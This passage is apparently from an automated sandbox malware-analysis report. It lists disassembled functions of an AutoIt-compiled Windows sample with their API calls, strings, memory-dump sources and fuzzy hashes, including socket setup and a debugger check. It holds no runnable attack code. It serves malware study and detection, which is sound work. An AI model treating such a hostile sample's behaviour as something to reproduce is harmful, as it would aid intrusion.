                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Internet$OpenOption
                    • String ID: <local>
                    • API String ID: 942729171-4266983199
                    • Opcode ID: d98b62db9485b6d70609547bdcfc2677200d44d4936c471c4f8683dca07bec7d
                    • Instruction ID: cc900de6be1c1327287bfd07872b5911cbd464d6209b9fb8bc0091cd85bdcb44
                    • Opcode Fuzzy Hash: d98b62db9485b6d70609547bdcfc2677200d44d4936c471c4f8683dca07bec7d
                    • Instruction Fuzzy Hash: A61102B0202225BADB348F518C98FFBFF68FF06351F10826AF90552041D2786D62DAF0
                    APIs
                      • Part of subcall function 007B830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,007B80C8,?,00000000,?,?), ref: 007B8322
                    • inet_addr.WSOCK32(00000000), ref: 007B80CB
                    • htons.WSOCK32(00000000), ref: 007B8108
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ByteCharMultiWidehtonsinet_addr
                    • String ID: 255.255.255.255
                    • API String ID: 2496851823-2422070025
                    • Opcode ID: ab6aaecba0a1240afc38f133804d1dbe8762b0a8749e9eee90d12e10e5d0391f
                    • Instruction ID: 6d1381debe3ec8737b3a266d64f5ffae058c41e2e05df400411a5222afec0def
                    • Opcode Fuzzy Hash: ab6aaecba0a1240afc38f133804d1dbe8762b0a8749e9eee90d12e10e5d0391f
                    • Instruction Fuzzy Hash: 3911A574600209EBDB10AF64DC8AFFDB769FF04350F10852AE91197291DB79A815C696
                    APIs
                      • Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82
                      • Part of subcall function 0079B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0079B0E7
                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00799355
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: 6b4cdbf7748617238d9197f7e7833de4f9d1254a5eb7ffd68577ed2ba04572e0
                    • Instruction ID: 628afa7dbba45d3f10bb17f76b014770f883ebd59bc11495a7361e120edb888d
                    • Opcode Fuzzy Hash: 6b4cdbf7748617238d9197f7e7833de4f9d1254a5eb7ffd68577ed2ba04572e0
                    • Instruction Fuzzy Hash: CC019E71A45218EB9F08EFA8DC96CFE7769BF06320B14061DFA72572D2DB39590C8650
                    APIs
                      • Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82
                      • Part of subcall function 0079B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0079B0E7
                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 0079924D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: c1ddb1cf0ff036cb6baba0efbe24db81332f337cba58c0315da8898fa1486854
                    • Instruction ID: 281d61034b237045d86f2e25a79fe1a142c826d0af89fa7a26d003d47da0ee55
                    • Opcode Fuzzy Hash: c1ddb1cf0ff036cb6baba0efbe24db81332f337cba58c0315da8898fa1486854
                    • Instruction Fuzzy Hash: 6601B171A41108BBDF08EBA4D996EFE77A8AF05300B140119BA1267282EB195E0C8262
                    APIs
                      • Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82
                      • Part of subcall function 0079B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0079B0E7
                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 007992D0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ClassMessageNameSend_memmove
                    • String ID: ComboBox$ListBox
                    • API String ID: 372448540-1403004172
                    • Opcode ID: a27268e39c8e78c833a9b88715d4b60d80a2952caf368fc9e1272098f886e356
                    • Instruction ID: d27c8714b712e4c5499e276856b489cb04b47f7f36449ce8bd8de48e2c814a9c
                    • Opcode Fuzzy Hash: a27268e39c8e78c833a9b88715d4b60d80a2952caf368fc9e1272098f886e356
                    • Instruction Fuzzy Hash: 9401A771A41108B7DF04E7A4D986EFF77ACAF11300F140119BA12632C2DB195F0C9271
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp
                    • String ID: #32770
                    • API String ID: 2292705959-463685578
                    • Opcode ID: b97ff1d0fa7ef3ac9ba44bfc7c7ee0884f7975381d6ae8fd4c97c0bc4d67e554
                    • Instruction ID: b36b3c5dee1023f111337192b80d039cfc765bfedbcabe0c49c85a3f6b0b3f9c
                    • Opcode Fuzzy Hash: b97ff1d0fa7ef3ac9ba44bfc7c7ee0884f7975381d6ae8fd4c97c0bc4d67e554
                    • Instruction Fuzzy Hash: 2EE06172A0022C2BD71097959C49FA7F7ACFB41731F00016BFD14D3040D57499048BD0
                    APIs
                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007981CA
                      • Part of subcall function 00763598: _doexit.LIBCMT ref: 007635A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Message_doexit
                    • String ID: AutoIt$Error allocating memory.
                    • API String ID: 1993061046-4017498283
                    • Opcode ID: 14470d17011fcbfd57d52f813ba2afd03b0b2a73d177dc3af66909bec2707cbb
                    • Instruction ID: e29f8ec4d2df1fcf19a47ceb9a17b3d4db0ab2ee2e5dc5d1e39f8abe3a1e5022
                    • Opcode Fuzzy Hash: 14470d17011fcbfd57d52f813ba2afd03b0b2a73d177dc3af66909bec2707cbb
                    • Instruction Fuzzy Hash: 92D05B323C535C72D61432B47C0FFD676484B15B51F444016FF09A56D38EDD599152ED
                    APIs
                      • Part of subcall function 0077B564: _memset.LIBCMT ref: 0077B571
                      • Part of subcall function 00760B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0077B540,?,?,?,0074100A), ref: 00760B89
                    • IsDebuggerPresent.KERNEL32(?,?,?,0074100A), ref: 0077B544
                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0074100A), ref: 0077B553
                    Strings
                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0077B54E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                    • API String ID: 3158253471-631824599
                    • Opcode ID: 3514cfd74c6ec3494bdd973a54f7ef7ef8dea12989eacaf144c2b561fd9caac7
                    • Instruction ID: b6a473924975366bd34addce8c28029fea8feffe8d25e48e0b7dc0c6064604bd
                    • Opcode Fuzzy Hash: 3514cfd74c6ec3494bdd973a54f7ef7ef8dea12989eacaf144c2b561fd9caac7
                    • Instruction Fuzzy Hash: F1E06DB0200750CBD720DF29E8087427BE4BF08758F00C92CE44AC2261EBBCD415CBA1